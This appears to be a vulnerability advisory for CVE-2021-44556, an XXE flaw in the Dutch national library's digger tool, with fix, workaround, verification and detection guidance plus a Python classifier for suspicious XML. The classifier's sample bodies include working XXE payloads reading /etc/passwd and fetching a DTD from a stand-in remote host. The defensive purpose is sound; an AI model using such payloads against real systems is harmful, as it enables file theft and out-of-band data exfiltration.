CVE-2021-44556

CVSS 9.1 CRITICAL

📋 TL;DR

CVE-2021-44556 is an XML External Entity (XXE) vulnerability in digger, a tool published by the National Library of the Netherlands (KB). An attacker who can submit XML to a vulnerable instance can declare an external entity that points at a file on the server and have the file's contents returned in the parsed output, or cause a denial of service. Every digger checkout that predates the fix commit and parses attacker-supplied XML is affected.

💻 Affected Systems

Products:
  • National Library of the Netherlands digger
Versions: Every revision before commit 6697d1269d981e35e11f240725b16401b5ce3db5 (the fix is identified by commit hash, not by a release number)
Operating Systems: All operating systems running digger
Default Config Vulnerable: ⚠️ Yes
Notes: The flaw is in digger's XML parsing: the parser resolves external entities declared in a DOCTYPE. Any instance that parses XML it did not produce itself is exposed.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Disclosure of any file the digger service account can read (application configuration, database credentials, SSH keys, tokens), which the attacker then uses to log in or pivot, ending in full takeover of the host. XXE reads are bounded by the service account's permissions and, with most parsers, by whether the file's content survives being parsed as XML text.

🟠 Likely Case

Unauthorized reading of files from the server filesystem, exposing configuration and data that should stay internal.

🟢 If Mitigated

Limited impact when the XML parser refuses DOCTYPE declarations or has external entity resolution disabled: the payload is rejected or the entity is left unexpanded.

🌐 Internet-Facing: HIGH - If the digger service is reachable from the internet and accepts XML input, it is directly exploitable with a generic XXE payload and no credentials.
🏢 Internal Only: MEDIUM - An attacker on the internal network, or a compromised internal host, can read files from the digger server and use what it finds (credentials, keys) to reach further systems.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

XXE is a well-understood class with generic public payloads, and the fixing pull request identifies the vulnerable parsing code, so adapting a payload to digger requires little effort.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Commit 6697d1269d981e35e11f240725b16401b5ce3db5 or later

Vendor Advisory: https://github.com/KBNLresearch/digger/pull/1

Restart Required: Yes

Instructions:

1. Update the checkout to commit 6697d1269d981e35e11f240725b16401b5ce3db5 or a later revision from the GitHub repository.
2. Restart the digger service so the patched code is loaded.
3. Verify that the fix commit is an ancestor of the deployed revision (see How to Verify below); the project is identified by commit hash, so there is no version string to compare.

🔧 Temporary Workarounds

Disable XML external entity processing

Applies to: all platforms

Configure the XML parser to disable external entity resolution and DTD processing.

The constant named on this page, XMLConstants.FEATURE_SECURE_PROCESSING, is specific to Java's JAXP parsers; there, set it to true and additionally disable the external-general-entities and external-parameter-entities features, because secure processing alone does not stop entity resolution on every JAXP implementation. For any other parser, apply the equivalent settings: turn off external general entities, external parameter entities and DTD loading, or use a parser that treats entity declarations as an error.

Input validation and filtering

Applies to: all platforms

Reject any XML that contains a DOCTYPE declaration or external entity reference before it reaches the parser. Legitimate input to digger has no need for a DOCTYPE.

Schema validation or an allow-list of accepted XML structures helps, but entity expansion happens while the document is being parsed, before schema validation runs, so validation complements the parser hardening rather than replacing it.

🧯 If You Can't Patch

  • Segment the network so that digger instances cannot reach sensitive internal systems, and run digger under a dedicated low-privilege account so that an XXE file read exposes as little as possible
  • Put a web application firewall (WAF) with XXE rules in front of the service to drop payloads containing DOCTYPE or external entity declarations; treat this as defence in depth, since WAF pattern matching can be evaded with alternative encodings

🔍 How to Verify

Check if Vulnerable:

In the deployed checkout, test whether the fix commit is already included: git merge-base --is-ancestor 6697d1269d981e35e11f240725b16401b5ce3db5 HEAD exits with status 0 when it is and 1 when it is not. If it is not included, the instance is vulnerable. To confirm behaviour rather than provenance, submit a benign XXE payload (an external entity pointing at a harmless local file, or at a URL on a host you control) and check whether its content appears in the output or the URL is fetched.

Check Version:

git log --oneline -1 shows only the current HEAD commit, which does not tell you whether the fix is among its ancestors; use the git merge-base --is-ancestor check above instead.

Verify Fix Applied:

After updating, confirm that git merge-base --is-ancestor 6697d1269d981e35e11f240725b16401b5ce3db5 HEAD exits 0, restart the service, and re-run the benign payload: the entity should be rejected or left unexpanded, and no request should reach your test host.

📡 Detection & Monitoring

Log Indicators:

  • XML parsing errors that mention entities or DOCTYPE, which a broken or partially blocked payload produces
  • Reads by the digger process of files outside its normal working set (for example /etc/passwd or SSH keys), if file-access auditing is in place
  • XML payloads containing DOCTYPE declarations; if legitimate input never carries one, any DOCTYPE is a strong indicator

Network Indicators:

  • HTTP requests whose XML body contains a DOCTYPE with a SYSTEM or PUBLIC identifier
  • Outbound HTTP or FTP connections from the digger host to unexpected destinations, which indicate remote DTD or entity fetches (the out-of-band form of XXE)

SIEM Query:

source="digger" AND (message="*DOCTYPE*" OR message="*ENTITY*" OR message="*SYSTEM*")

This query only matches if request bodies or parser error messages are written to the log; check that they are before relying on it, and expect *SYSTEM* on its own to be noisy.
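A keyword match such as the query above flags every mention of DOCTYPE; the detector below, an added example that is not part of the original advisory or of digger, goes further and classifies what a captured request body actually declares: whether a DOCTYPE is present, whether any entity has an external identifier, whether it is a parameter entity, and whether its target is a local path or a remote URL (the out-of-band case). The sample bodies are constructed, 203.0.113.5 is a documentation address, and the verdict labels are this example's own.

```python
"""Classify XXE-shaped XML in captured request bodies (added example).

This is not digger's code nor a rule from the original advisory. It looks
inside request bodies, as a WAF or reverse proxy might log them, and
classifies DOCTYPE usage instead of matching bare keywords. The sample
bodies are constructed; 203.0.113.5 is a documentation address.
"""
import re

# Constructed sample request bodies (not real traffic).
SAMPLES = {
    "benign": (
        b'<?xml version="1.0"?>'
        b'<record><title>Annual report</title></record>'
    ),
    "file_read": (
        b'<?xml version="1.0"?>'
        b'<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]>'
        b'<r>&x;</r>'
    ),
    "oob": (
        b'<!DOCTYPE r [<!ENTITY % p SYSTEM "http://203.0.113.5/evil.dtd"> %p;]>'
        b'<r/>'
    ),
    "internal_only": (
        b'<!DOCTYPE r [<!ENTITY co "Koninklijke Bibliotheek">]>'
        b'<r>&co;</r>'
    ),
}

DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b")
# Entity declarations with an external identifier: SYSTEM "uri" or
# PUBLIC "pubid" "uri". A leading % marks a parameter entity.
EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>%]+)\s+"
    rb"(?:SYSTEM|PUBLIC\s+(?:\"[^\"]*\"|'[^']*'))\s+"
    rb"(?P<uri>\"[^\"]*\"|'[^']*')"
)
# Anything that is not a plain path or file: URI is treated as a remote
# fetch; parser-specific schemes (php:, jar:, ...) deserve a look too.
LOCAL_SCHEMES = {"file", "path"}


def classify(body: bytes) -> dict:
    """Report DOCTYPE presence, external entity declarations and a verdict."""
    externals = []
    for m in EXTERNAL_ENTITY_RE.finditer(body):
        uri = m.group("uri")[1:-1].decode("utf-8", "replace")
        scheme = uri.split(":", 1)[0].lower() if ":" in uri else "path"
        externals.append({
            "name": m.group("name").decode("utf-8", "replace"),
            "parameter": m.group("param") is not None,
            "uri": uri,
            "scheme": scheme,
        })
    has_doctype = DOCTYPE_RE.search(body) is not None
    if not has_doctype:
        verdict = "clean"
    elif not externals:
        # Internal entities only: no file read, but still unusual input
        # and a possible entity-expansion denial of service.
        verdict = "doctype-no-external"
    elif any(e["scheme"] not in LOCAL_SCHEMES for e in externals):
        # Remote DTD or entity fetch: the out-of-band exfiltration pattern.
        verdict = "xxe-remote"
    else:
        # External entity bound to a local file: the file-read pattern.
        verdict = "xxe-local"
    return {"doctype": has_doctype, "external": externals, "verdict": verdict}


def scan(samples: dict) -> dict:
    """Verdict per sample, the shape a SIEM enrichment step would emit."""
    return {name: classify(body)["verdict"] for name, body in samples.items()}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        result = classify(body)
        targets = ", ".join(e["uri"] for e in result["external"]) or "-"
        print(f"{name:14s} {result['verdict']:20s} {targets}")
```

The parameter-entity and remote-URI fields are what distinguish an out-of-band attempt (which needs the digger host to make outbound connections) from a plain local file read, so they are worth carrying into the alert rather than collapsing everything into one DOCTYPE hit.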
